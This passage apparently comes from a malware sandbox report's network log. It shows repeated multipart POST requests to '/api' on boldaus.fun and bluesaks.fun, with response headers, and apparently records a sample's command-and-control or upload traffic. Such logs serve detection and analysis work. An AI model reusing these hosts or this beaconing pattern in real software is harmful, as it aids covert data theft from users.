                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=a0UKltV%2BuoXcIpcEgTYL3RTGEoKYg8NfcCncYL%2FNplZstE%2BcUp%2FTu2iwXUP52y52uKRRdis42uIsr%2Bo3DIEh3HWbTZ28qSPlpRn3P5YuG%2FYaMrypy6yCsUgl5dvbnh0%3D"}],"group":"cf-nel","max_age":604800}
                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                              Server: cloudflare
                                                                                              CF-RAY: 81b25592dc3c6644-AMS
                                                                                            • flag-us
                                                                                              POST
                                                                                              http://boldaus.fun/api
                                                                                              Remote address:
                                                                                              104.21.28.22:80
                                                                                              Request
                                                                                              POST /api HTTP/1.1
                                                                                              Connection: Keep-Alive
                                                                                              Content-Type: multipart/form-data; boundary=SqDe87817huf871793q74
                                                                                              Cookie: __cf_mw_byp=D_GWVs900j7AvUvW88.VX3qQPlGbsLK9OBfBUpsaaUY-1698151707-0-/api
                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                              Content-Length: 534
                                                                                              Host: boldaus.fun
                                                                                              Response
                                                                                              HTTP/1.1 200 OK
                                                                                              Date: Tue, 24 Oct 2023 12:48:28 GMT
                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                              Transfer-Encoding: chunked
                                                                                              Connection: keep-alive
                                                                                              X-Powered-By: PHP/8.2.7
                                                                                              Set-Cookie: PHPSESSID=palqd1rvevfn0m205tq8fjjm67; expires=Sat, 17 Feb 2024 06:35:07 GMT; Max-Age=9999999; path=/
                                                                                              Set-Cookie: xdober_setting_show_country=1; expires=Sat, 23 Dec 2023 12:48:28 GMT; Max-Age=5184000; path=/
                                                                                              Set-Cookie: xdober_setting_big_flags=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
                                                                                              Set-Cookie: xdober_setting_ai_detect=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
                                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                              Cache-Control: no-store, no-cache, must-revalidate
                                                                                              Pragma: no-cache
                                                                                              CF-Cache-Status: DYNAMIC
                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=hVxyRHtBHQsBJEsNb%2Bj63caIm%2FtpiYzXXJuuDYXOqbOpmqT0w3ygp9OVSPXBBnTUaD%2F%2FsLr0OsYHoUBynvlrY%2BkGXYgpP8GS89yRgTlKairHJZ964R%2FbSOTbWMjmGQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                              Server: cloudflare
                                                                                              CF-RAY: 81b25592d809b710-AMS
                                                                                            • flag-us
                                                                                              POST
                                                                                              http://boldaus.fun/api
                                                                                              Remote address:
                                                                                              104.21.28.22:80
                                                                                              Request
                                                                                              POST /api HTTP/1.1
                                                                                              Connection: Keep-Alive
                                                                                              Content-Type: multipart/form-data; boundary=SqDe87817huf871793q74
                                                                                              Cookie: __cf_mw_byp=D_GWVs900j7AvUvW88.VX3qQPlGbsLK9OBfBUpsaaUY-1698151707-0-/api
                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                              Content-Length: 534
                                                                                              Host: boldaus.fun
                                                                                              Response
                                                                                              HTTP/1.1 200 OK
                                                                                              Date: Tue, 24 Oct 2023 12:48:28 GMT
                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                              Transfer-Encoding: chunked
                                                                                              Connection: keep-alive
                                                                                              X-Powered-By: PHP/8.2.7
                                                                                              Set-Cookie: PHPSESSID=1uk6dq4ala0o5kphefqth0rrkt; expires=Sat, 17 Feb 2024 06:35:07 GMT; Max-Age=9999999; path=/
                                                                                              Set-Cookie: xdober_setting_show_country=1; expires=Sat, 23 Dec 2023 12:48:28 GMT; Max-Age=5184000; path=/
                                                                                              Set-Cookie: xdober_setting_big_flags=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
                                                                                              Set-Cookie: xdober_setting_ai_detect=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
                                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                              Cache-Control: no-store, no-cache, must-revalidate
                                                                                              Pragma: no-cache
                                                                                              CF-Cache-Status: DYNAMIC
                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=0UbL7bsTcb8iQ5CaDLpuNqB9WD5HZOhPApHEkkaWT0V4yVKwWuP%2FNQWo7NrMXsxnoWO%2F%2F68Cw6vrkOyXYIQp%2FUajEDWP1njyieMpB%2BChKIAraRwaR78XkxUtz1Ey2A%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                              Server: cloudflare
                                                                                              CF-RAY: 81b255940d7865fd-AMS
                                                                                            • flag-us
                                                                                              POST
                                                                                              http://bluesaks.fun/api
                                                                                              Remote address:
                                                                                              172.67.163.21:80
                                                                                              Request
                                                                                              POST /api HTTP/1.1
                                                                                              Connection: Keep-Alive
                                                                                              Content-Type: multipart/form-data; boundary=SqDe87817huf871793q74
                                                                                              Cookie: __cf_mw_byp=7t_Y.6k.nwL6Kk9ow1_F903D0iyIjI.ToTsZ1Mki4n0-1698151707-0-/api
                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                              Content-Length: 527
                                                                                              Host: bluesaks.fun
                                                                                              Response
                                                                                              HTTP/1.1 200 OK
                                                                                              Date: Tue, 24 Oct 2023 12:48:28 GMT
                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                              Transfer-Encoding: chunked
                                                                                              Connection: keep-alive
                                                                                              X-Powered-By: PHP/8.2.7
                                                                                              Set-Cookie: PHPSESSID=mapdtrq5j4q0h0rg65obcakkea; expires=Sat, 17 Feb 2024 06:35:07 GMT; Max-Age=9999999; path=/
                                                                                              Set-Cookie: xdober_setting_show_country=1; expires=Sat, 23 Dec 2023 12:48:28 GMT; Max-Age=5184000; path=/
                                                                                              Set-Cookie: xdober_setting_big_flags=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
                                                                                              Set-Cookie: xdober_setting_ai_detect=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
                                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                              Cache-Control: no-store, no-cache, must-revalidate
                                                                                              Pragma: no-cache
                                                                                              CF-Cache-Status: DYNAMIC
                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=d6cgVW1CToP8EGApvkJmP6bYPEuBJUKyap5SM9%2FLfzdXRruQvNCn76PR3IdwqUaet2H%2BCqewDhbjqNNTcjblgEQPdMSWb%2B5%2BG6jxD0I6IOHjksuVWbOQBV5VCuh4y0g%3D"}],"group":"cf-nel","max_age":604800}
                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                              Server: cloudflare
                                                                                              CF-RAY: 81b255940e1a0a75-AMS
                                                                                            • flag-us
                                                                                              POST
                                                                                              http://boldaus.fun/api
                                                                                              Remote address:
                                                                                              104.21.28.22:80
                                                                                              Request
                                                                                              POST /api HTTP/1.1
                                                                                              Connection: Keep-Alive
                                                                                              Content-Type: multipart/form-data; boundary=SqDe87817huf871793q74
                                                                                              Cookie: __cf_mw_byp=D_GWVs900j7AvUvW88.VX3qQPlGbsLK9OBfBUpsaaUY-1698151707-0-/api
                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                              Content-Length: 534
                                                                                              Host: boldaus.fun
                                                                                              Response
                                                                                              HTTP/1.1 200 OK
                                                                                              Date: Tue, 24 Oct 2023 12:48:29 GMT
                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                              Transfer-Encoding: chunked
                                                                                              Connection: keep-alive
                                                                                              X-Powered-By: PHP/8.2.7
                                                                                              Set-Cookie: PHPSESSID=e2p0os98n6ptf0g0295pcok7lu; expires=Sat, 17 Feb 2024 06:35:08 GMT; Max-Age=9999999; path=/
                                                                                              Set-Cookie: xdober_setting_show_country=1; expires=Sat, 23 Dec 2023 12:48:29 GMT; Max-Age=5184000; path=/
                                                                                              Set-Cookie: xdober_setting_big_flags=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
                                                                                              Set-Cookie: xdober_setting_ai_detect=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
                                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                              Cache-Control: no-store, no-cache, must-revalidate
                                                                                              Pragma: no-cache
                                                                                              CF-Cache-Status: DYNAMIC
                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=gcMZiNpFin4UCVb3Ru5I122ryiCAw0ARSvZAZFXxRFMy58sXoMTPnOuKw%2B%2FdnpjLEVvrdPQ6pTKn%2BgNPP896X48ZLKNHmEYj8vtRinNXP1eKotUVvLeSZwVPdbWmdA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                              Server: cloudflare
                                                                                              CF-RAY: 81b25594fcab6572-AMS
                                                                                            • flag-us
                                                                                              POST
                                                                                              http://bluesaks.fun/api
                                                                                              Remote address:
                                                                                              172.67.163.21:80
                                                                                              Request
                                                                                              POST /api HTTP/1.1
                                                                                              Connection: Keep-Alive
                                                                                              Content-Type: multipart/form-data; boundary=SqDe87817huf871793q74
                                                                                              Cookie: __cf_mw_byp=7t_Y.6k.nwL6Kk9ow1_F903D0iyIjI.ToTsZ1Mki4n0-1698151707-0-/api
                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                              Content-Length: 527
                                                                                              Host: bluesaks.fun
                                                                                              Response
                                                                                              HTTP/1.1 200 OK
                                                                                              Date: Tue, 24 Oct 2023 12:48:29 GMT
                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                              Transfer-Encoding: chunked
                                                                                              Connection: keep-alive
                                                                                              X-Powered-By: PHP/8.2.7
                                                                                              Set-Cookie: PHPSESSID=8mqvq846otdtsu22gvol3pf73l; expires=Sat, 17 Feb 2024 06:35:08 GMT; Max-Age=9999999; path=/
                                                                                              Set-Cookie: xdober_setting_show_country=1; expires=Sat, 23 Dec 2023 12:48:29 GMT; Max-Age=5184000; path=/
                                                                                              Set-Cookie: xdober_setting_big_flags=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
                                                                                              Set-Cookie: xdober_setting_ai_detect=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
                                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                              Cache-Control: no-store, no-cache, must-revalidate
                                                                                              Pragma: no-cache
                                                                                              CF-Cache-Status: DYNAMIC
                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=Opr0JvNsQ8LWdic3TPpDx1k5NJzET1V8dwJkUyk76564lsmItUSTcnyVQG0TqNyzg%2BA4WYHITvNde3chwBrrGcSndi6dx3rgFknAHV2kiO7eFIZnDAbvzfCxuUTCSRc%3D"}],"group":"cf-nel","max_age":604800}
                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                              Server: cloudflare
                                                                                              CF-RAY: 81b255952ca4b8f6-AMS
                                                                                            • flag-us
                                                                                              POST
                                                                                              http://boldaus.fun/api
                                                                                              Remote address:
                                                                                              104.21.28.22:80
                                                                                              Request
                                                                                              POST /api HTTP/1.1
                                                                                              Connection: Keep-Alive
                                                                                              Content-Type: multipart/form-data; boundary=SqDe87817huf871793q74
                                                                                              Cookie: __cf_mw_byp=D_GWVs900j7AvUvW88.VX3qQPlGbsLK9OBfBUpsaaUY-1698151707-0-/api
                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                              Content-Length: 534
                                                                                              Host: boldaus.fun
                                                                                              Response
                                                                                              HTTP/1.1 200 OK
                                                                                              Date: Tue, 24 Oct 2023 12:48:29 GMT
                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                              Transfer-Encoding: chunked
                                                                                              Connection: keep-alive
                                                                                              X-Powered-By: PHP/8.2.7
                                                                                              Set-Cookie: PHPSESSID=1afdg26b45odmqm9k6jvgituhm; expires=Sat, 17 Feb 2024 06:35:08 GMT; Max-Age=9999999; path=/
                                                                                              Set-Cookie: xdober_setting_show_country=1; expires=Sat, 23 Dec 2023 12:48:29 GMT; Max-Age=5184000; path=/
                                                                                              Set-Cookie: xdober_setting_big_flags=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
                                                                                              Set-Cookie: xdober_setting_ai_detect=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
                                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                              Cache-Control: no-store, no-cache, must-revalidate
                                                                                              Pragma: no-cache
                                                                                              CF-Cache-Status: DYNAMIC
                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=BCjOzCKmvX045feEB4u8GrM3pCILQpEvSi5l87mgfbj%2BP5eNs7X0WQBG4xY%2BYnQ%2FUDzkplGpQoEgEIyPuZhhl92uMuX9YQphHeAe29ASy0kWs0ZP18RtbsiryXmoTQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                              Server: cloudflare
                                                                                              CF-RAY: 81b255962c2ab8b2-AMS
                                                                                            • flag-us
                                                                                              POST
                                                                                              http://bluesaks.fun/api
                                                                                              Remote address:
                                                                                              172.67.163.21:80
                                                                                              Request
                                                                                              POST /api HTTP/1.1
                                                                                              Connection: Keep-Alive
                                                                                              Content-Type: multipart/form-data; boundary=SqDe87817huf871793q74
                                                                                              Cookie: __cf_mw_byp=7t_Y.6k.nwL6Kk9ow1_F903D0iyIjI.ToTsZ1Mki4n0-1698151707-0-/api
                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                              Content-Length: 527
                                                                                              Host: bluesaks.fun
                                                                                              Response
                                                                                              HTTP/1.1 200 OK
                                                                                              Date: Tue, 24 Oct 2023 12:48:29 GMT
                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                              Transfer-Encoding: chunked
                                                                                              Connection: keep-alive
                                                                                              X-Powered-By: PHP/8.2.7
                                                                                              Set-Cookie: PHPSESSID=u8a57c8n4ro4t8633dbe736g4e; expires=Sat, 17 Feb 2024 06:35:08 GMT; Max-Age=9999999; path=/
                                                                                              Set-Cookie: xdober_setting_show_country=1; expires=Sat, 23 Dec 2023 12:48:29 GMT; Max-Age=5184000; path=/
                                                                                              Set-Cookie: xdober_setting_big_flags=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
                                                                                              Set-Cookie: xdober_setting_ai_detect=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
                                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                              Cache-Control: no-store, no-cache, must-revalidate
                                                                                              Pragma: no-cache
                                                                                              CF-Cache-Status: DYNAMIC
                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=yQeIubzzBcKmAaVk%2Br%2BaP7bylb9CNRTBDrTnjXwgertFf1SAD2ezEoT54InQQUbPQFEg8iHksGcAmEZty6faA1oQ4N0Mf9xs1R78XQpI%2BNQ3ZlfA%2FnznlGipeIJRiNk%3D"}],"group":"cf-nel","max_age":604800}
                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                              Server: cloudflare
                                                                                              CF-RAY: 81b25596482c0a65-AMS
                                                                                            • flag-us
                                                                                              POST
                                                                                              http://bluesaks.fun/api
                                                                                              Remote address:
                                                                                              172.67.163.21:80
                                                                                              Request
                                                                                              POST /api HTTP/1.1
                                                                                              Connection: Keep-Alive
                                                                                              Content-Type: multipart/form-data; boundary=SqDe87817huf871793q74
                                                                                              Cookie: __cf_mw_byp=7t_Y.6k.nwL6Kk9ow1_F903D0iyIjI.ToTsZ1Mki4n0-1698151707-0-/api
                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                              Content-Length: 527
                                                                                              Host: bluesaks.fun
                                                                                              Response
                                                                                              HTTP/1.1 200 OK
                                                                                              Date: Tue, 24 Oct 2023 12:48:29 GMT
                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                              Transfer-Encoding: chunked
                                                                                              Connection: keep-alive
                                                                                              X-Powered-By: PHP/8.2.7
                                                                                              Set-Cookie: PHPSESSID=0aathch49ua9gs103rnlnohs08; expires=Sat, 17 Feb 2024 06:35:08 GMT; Max-Age=9999999; path=/
                                                                                              Set-Cookie: xdober_setting_show_country=1; expires=Sat, 23 Dec 2023 12:48:29 GMT; Max-Age=5184000; path=/
                                                                                              Set-Cookie: xdober_setting_big_flags=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
                                                                                              Set-Cookie: xdober_setting_ai_detect=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
                                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                              Cache-Control: no-store, no-cache, must-revalidate
                                                                                              Pragma: no-cache
                                                                                              CF-Cache-Status: DYNAMIC
                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=SFmBSRuJ7t%2Fiz1ELrT3hCQsuTljpCEx79Kw9DFlwOW1eZmcs8L3S99o8GteHxNBn%2FYDE6KJ4AeA84gjYhnBe74pxi379zkdDG9KP0JN%2BtBVbqozWVI6sFW3AKa2VKc0%3D"}],"group":"cf-nel","max_age":604800}
                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                              Server: cloudflare
                                                                                              CF-RAY: 81b255974b1e666e-AMS
                                                                                            • flag-us
                                                                                              POST
                                                                                              http://boldaus.fun/api
                                                                                              Remote address:
                                                                                              104.21.28.22:80
                                                                                              Request
                                                                                              POST /api HTTP/1.1
                                                                                              Connection: Keep-Alive
                                                                                              Content-Type: multipart/form-data; boundary=SqDe87817huf871793q74
                                                                                              Cookie: __cf_mw_byp=D_GWVs900j7AvUvW88.VX3qQPlGbsLK9OBfBUpsaaUY-1698151707-0-/api
                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                              Content-Length: 534
                                                                                              Host: boldaus.fun
                                                                                              Response
                                                                                              HTTP/1.1 200 OK
                                                                                              Date: Tue, 24 Oct 2023 12:48:29 GMT
                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                              Transfer-Encoding: chunked
                                                                                              Connection: keep-alive
                                                                                              X-Powered-By: PHP/8.2.7
                                                                                              Set-Cookie: PHPSESSID=8ao8ijkm9p0q7245h9af9jjseg; expires=Sat, 17 Feb 2024 06:35:08 GMT; Max-Age=9999999; path=/
                                                                                              Set-Cookie: xdober_setting_show_country=1; expires=Sat, 23 Dec 2023 12:48:29 GMT; Max-Age=5184000; path=/
                                                                                              Set-Cookie: xdober_setting_big_flags=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
                                                                                              Set-Cookie: xdober_setting_ai_detect=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
                                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                              Cache-Control: no-store, no-cache, must-revalidate
                                                                                              Pragma: no-cache
                                                                                              CF-Cache-Status: DYNAMIC
                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=hTKtC%2BIvJ0iTnFsNT9%2FE2kl9HTmc0jYpswl3J39g49SS48BJ%2Fvki3zTVaqLAcGHIBLey5zbye1FanPsdmBVZB3LUIw5qfhyssCFCMSh8Hk%2BamPRcVJh7rrnQiMsHAA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                              Server: cloudflare
                                                                                              CF-RAY: 81b255974f726638-AMS
                                                                                            • flag-us
                                                                                              POST
                                                                                              http://bluesaks.fun/api
                                                                                              Remote address:
                                                                                              172.67.163.21:80
                                                                                              Request
                                                                                              POST /api HTTP/1.1
                                                                                              Connection: Keep-Alive
                                                                                              Content-Type: multipart/form-data; boundary=SqDe87817huf871793q74
                                                                                              Cookie: __cf_mw_byp=7t_Y.6k.nwL6Kk9ow1_F903D0iyIjI.ToTsZ1Mki4n0-1698151707-0-/api
                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                              Content-Length: 527
                                                                                              Host: bluesaks.fun
                                                                                              Response
                                                                                              HTTP/1.1 200 OK
                                                                                              Date: Tue, 24 Oct 2023 12:48:29 GMT
                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                              Transfer-Encoding: chunked
                                                                                              Connection: keep-alive
                                                                                              X-Powered-By: PHP/8.2.7
                                                                                              Set-Cookie: PHPSESSID=cknf42icusnrlosjsh175nstbk; expires=Sat, 17 Feb 2024 06:35:08 GMT; Max-Age=9999999; path=/
                                                                                              Set-Cookie: xdober_setting_show_country=1; expires=Sat, 23 Dec 2023 12:48:29 GMT; Max-Age=5184000; path=/
                                                                                              Set-Cookie: xdober_setting_big_flags=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
                                                                                              Set-Cookie: xdober_setting_ai_detect=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
                                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                              Cache-Control: no-store, no-cache, must-revalidate
                                                                                              Pragma: no-cache
                                                                                              CF-Cache-Status: DYNAMIC
                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=6%2BkeLoaRpNRDND5GyPbnPJ6HUYt1tUZG2kz8JGK8vwTc1bpTqXBOv67NYM4ULOyD9R8tPk9M42U%2FFauYOeinL84g6xZf4F01ZxTWrkCbMtSBIzy3UdzeYNKm8bMMQS0%3D"}],"group":"cf-nel","max_age":604800}
                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                              Server: cloudflare
                                                                                              CF-RAY: 81b25598ada5b97e-AMS
                                                                                            • flag-us
                                                                                              POST
                                                                                              http://boldaus.fun/api
                                                                                              Remote address:
                                                                                              104.21.28.22:80
                                                                                              Request
                                                                                              POST /api HTTP/1.1
                                                                                              Connection: Keep-Alive
                                                                                              Content-Type: multipart/form-data; boundary=SqDe87817huf871793q74
                                                                                              Cookie: __cf_mw_byp=D_GWVs900j7AvUvW88.VX3qQPlGbsLK9OBfBUpsaaUY-1698151707-0-/api
                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                              Content-Length: 534
                                                                                              Host: boldaus.fun
                                                                                              Response
                                                                                              HTTP/1.1 200 OK
                                                                                              Date: Tue, 24 Oct 2023 12:48:29 GMT
                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                              Transfer-Encoding: chunked
                                                                                              Connection: keep-alive
                                                                                              X-Powered-By: PHP/8.2.7
                                                                                              Set-Cookie: PHPSESSID=da588rnirc8k73n0faap0douu5; expires=Sat, 17 Feb 2024 06:35:08 GMT; Max-Age=9999999; path=/
                                                                                              Set-Cookie: xdober_setting_show_country=1; expires=Sat, 23 Dec 2023 12:48:29 GMT; Max-Age=5184000; path=/
                                                                                              Set-Cookie: xdober_setting_big_flags=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
                                                                                              Set-Cookie: xdober_setting_ai_detect=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
                                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                              Cache-Control: no-store, no-cache, must-revalidate
                                                                                              Pragma: no-cache
                                                                                              CF-Cache-Status: DYNAMIC
                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=t46AfMRq1ZobNLqH16qvXE2DwHHbb2vs1tTy7ftmNjsdq4%2BimoRBMmLfl5SXjePR89s%2FnKNPn%2F2aTRLHC5%2FETS5BsgI5lUv71cfX%2FThZNPyZpsju0HtAIy41EM6GPw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                              Server: cloudflare
                                                                                              CF-RAY: 81b25598a8bb5c4c-AMS
                                                                                            • flag-us
                                                                                              POST
                                                                                              http://bluesaks.fun/api
                                                                                              Remote address:
                                                                                              172.67.163.21:80
                                                                                              Request
                                                                                              POST /api HTTP/1.1
                                                                                              Connection: Keep-Alive
                                                                                              Content-Type: multipart/form-data; boundary=SqDe87817huf871793q74
                                                                                              Cookie: __cf_mw_byp=7t_Y.6k.nwL6Kk9ow1_F903D0iyIjI.ToTsZ1Mki4n0-1698151707-0-/api
                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                              Content-Length: 527
                                                                                              Host: bluesaks.fun
                                                                                              Response
                                                                                              HTTP/1.1 200 OK
                                                                                              Date: Tue, 24 Oct 2023 12:48:29 GMT
                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                              Transfer-Encoding: chunked
                                                                                              Connection: keep-alive
                                                                                              X-Powered-By: PHP/8.2.7
                                                                                              Set-Cookie: PHPSESSID=qr29cm097uook088to8gsfqbh0; expires=Sat, 17 Feb 2024 06:35:08 GMT; Max-Age=9999999; path=/
                                                                                              Set-Cookie: xdober_setting_show_country=1; expires=Sat, 23 Dec 2023 12:48:29 GMT; Max-Age=5184000; path=/
                                                                                              Set-Cookie: xdober_setting_big_flags=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
                                                                                              Set-Cookie: xdober_setting_ai_detect=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
                                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                              Cache-Control: no-store, no-cache, must-revalidate
                                                                                              Pragma: no-cache
                                                                                              CF-Cache-Status: DYNAMIC
                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=f9fA5OxFEW%2Fgh6%2FG92dyq92bJ6qmliK2rPOuRL53lu5p2jKwCggGS8X9PGyJAu0e1%2FLR5ILOmYTqzlDbkP6rgX2ODnGzfyw3RDB7dcDNu1Gzfg7GSWJ1Zgqup52Kz4k%3D"}],"group":"cf-nel","max_age":604800}
                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                              Server: cloudflare
                                                                                              CF-RAY: 81b25599fe31b98e-AMS
                                                                                            • flag-us
                                                                                              POST
                                                                                              http://boldaus.fun/api
                                                                                              Remote address:
                                                                                              104.21.28.22:80
                                                                                              Request
                                                                                              POST /api HTTP/1.1
                                                                                              Connection: Keep-Alive
                                                                                              Content-Type: multipart/form-data; boundary=SqDe87817huf871793q74
                                                                                              Cookie: __cf_mw_byp=D_GWVs900j7AvUvW88.VX3qQPlGbsLK9OBfBUpsaaUY-1698151707-0-/api
                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                              Content-Length: 534
                                                                                              Host: boldaus.fun
                                                                                              Response
                                                                                              HTTP/1.1 200 OK
                                                                                              Date: Tue, 24 Oct 2023 12:48:29 GMT
                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                              Transfer-Encoding: chunked
                                                                                              Connection: keep-alive
                                                                                              X-Powered-By: PHP/8.2.7
                                                                                              Set-Cookie: PHPSESSID=hb649niit810cfgq4b814057ma; expires=Sat, 17 Feb 2024 06:35:08 GMT; Max-Age=9999999; path=/
                                                                                              Set-Cookie: xdober_setting_show_country=1; expires=Sat, 23 Dec 2023 12:48:29 GMT; Max-Age=5184000; path=/
